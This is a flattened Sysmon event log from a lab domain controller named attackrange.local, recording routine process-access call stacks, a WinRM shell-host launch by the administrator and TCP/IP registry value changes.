13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.923{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-42BD-6000-A1E0-080000000000}0x8e0a10HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.570{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD 